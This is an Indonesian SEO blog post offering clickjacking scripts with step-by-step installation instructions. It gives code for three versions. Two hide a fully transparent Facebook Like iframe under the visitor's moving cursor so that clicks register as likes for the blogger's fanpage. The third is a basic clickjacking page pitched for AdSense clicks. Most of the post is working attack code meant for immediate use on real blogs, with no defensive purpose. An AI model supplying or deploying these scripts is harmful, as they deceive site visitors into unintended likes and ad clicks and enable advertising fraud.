Script ClickJacking

ARTIKEL BELAJAR SEO Langsung aja ya sobat rampok buat kamu yang mau dapat like untuk facebook kamu silahkan dicobain script ClickJacking ini ya cara pemasangan mudah kok sob coba lihat tutorialnya dibawah ini ^_^

Ada yang mau lihat lihat koleksi atau membeli KAOS DAKWAH atau KAOS DISTRO bisa di lihat stok nya di GHIRAH

Masuk kemode Edit Template / HTML
Cari Kode HTML </head> terus letakin kode jQuery dibawah ini tepat diatas kode </head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type="text/javascript">
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
</script>

Cara kedua cari kode </body> kalau udah ketemu
Kemudian sobat rampok tinggal letakin kode Javascript dibawah ini tepat diatas kode </body>

<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Link Fanspage&amp;layout=button_count&amp;show_faces=false&amp;
width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>

Keterangan itu tulisan yang berwarna biru dan dibold silahkan sobat ganti dengan alamat Fanspage sobat, Oke sekian dulu informasi mengenai Script ClickJacking Buat Like Facebook Semoga bermanfaat bagi nusa dan bangsa ^_^

yang dibawah ini basic buat adsense sob coba dikembangin ya ^_^
html>
<head>
                <title>Basic ClickJacking Script</title>
               <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <style>
                html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }
        div.wrax { width: 100%; height: 100%; overflow: auto; }
        img.bg { min-height: 100%; min-width: 1024px; width: 100%; height: 100%; position: fixed; top: 0; left: 0; z-index: 0; }
        @media screen and (max-width: 1024px) { img.bg { left: 50%; margin-left: -512px; } }
        #mis { text-align: center; position: absolute; width: 100%; height: 100%; top: 0; left: 0; color: #fff; font-family: 'palatino linotype', palatino; font-weight: normal; text-align: left; text-shadow: 0 1px 0 #000; z-index: 10; }
        #mis .description { position: relative; width: 580px; left: 50%; margin-left: -290px; }
        #mis .description h1 { font-size: 32px; }
        #mis .description .warning { color: #f00; }
        #mis .description .link, #mis .description a { font-size: 22px; color: #fff; text-decoration: underline; }
        #mis .description .footer, #mis .description .footer a { font-size: 10px; }
    </style>
</head>
<body><span id="link" class="link">

<!-- Assume Website CONTENT is HERE -->

    <div id="mis">
                   <div align="center">

            <img src="black-whtie-world-map.jpg" width="800" height="457"/>
           </div>
    </div>
    <div id="wrax" style="position: absolute; opacity: 0.5; filter: alpha(opacity = 50); margin-left: -50px; z-index: 100;">



<a href="http://www.navoditkumar.com" target="_blank" title="Indian"><img src="Indian-Flag.gif" alt="India" ></a>


    </div>
    <script type="text/javascript">
        jQuery( document ).ready( function() {
            $( "#link" ).mousemove( function( e ) {
                $( '#wrax' ).css( {
                    top: e.pageY - 17,
                    left: e.pageX - 8
                } );
            } );
        } )
    </script>

</span></body>
</html>

Download Versi 1 disini  atau bisa didownload disini script clickjacking adsense gratis 

Atau pakai Versi yang ini :

<script type="text/javascript">
(function(){

  var Xcord = 0,
  Ycord = 0,
  IE = document.all ? true : false;

  if (!IE) document.captureEvents(Event.MOUSEMOVE);

  var lbox = document.createElement('iframe');
  lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/kuntillepascom') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
  lbox.scrolling = 'no';
  lbox.frameBorder = 0;
  lbox.allowTransparency = 'true';
  lbox.style.border = 0;
  lbox.style.overflow = 'hidden';
  lbox.style.cursor = 'pointer';
  lbox.style.width = '53px';
  lbox.style.height =  '23px';
  lbox.style.position = 'absolute';
  lbox.style.opacity = 0;
  document.getElementsByTagName('body')[0].appendChild(lbox);

  window.addEventListener('mousemove', mouseMove, false);

  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 16000);

  function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }
 
    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;
 
    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';
 
    return true
  }
})();

</script>
kalau yang diatas ini lu tinggal pasang di menu gadget blog kalian masing masing.
Axact

ARTIKEL BELAJAR SEO

ARTIKEL BELAJAR SEO Adalah sebuah blog yang membahas search engine optimization khususnya search pada mesin pencarian yang paling terkenal GOOGLE. Sebagian artkel ini kami Copas dari berbagai sumber, tidak mengurangi hormat kami, kami mohon maaf jika artikel anda kena copas semoga ilmu yang anda tulis di blog bisa bermanfaat dan tentunya pahala akan mengalir kepembuat tulisan pertama..Aamiin

Post A Comment:

0 comments: